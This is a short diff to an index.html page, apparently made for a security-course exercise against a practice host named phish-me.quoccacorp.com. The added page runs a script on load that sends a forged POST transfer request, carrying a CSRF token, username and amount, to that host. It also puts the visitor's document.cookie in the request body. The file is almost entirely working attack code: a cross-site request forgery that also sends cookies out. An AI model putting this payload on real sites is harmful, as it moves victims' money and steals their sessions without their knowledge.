--- a/index.html
+++ b/index.html
@@ -1,1 +1,20 @@
-Hello World
+<!DOCTYPE html>
+<html>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1">
+<link rel="stylesheet" href="https://www.w3schools.com/w3css/3/w3.css">
+<body onload="myFunction()">
+
+    <script>
+        function myFunction() {
+            fetch('phish-me.quoccacorp.com/api/transfer?csrf_token=MzUwOQ%253D%253D&username=z5359006&amount=1', {
+            method: 'POST',
+            mode: 'no-cors',
+            body:document.cookie
+            });
+        }
+    </script>
+        
+        
+</body>
+</html>
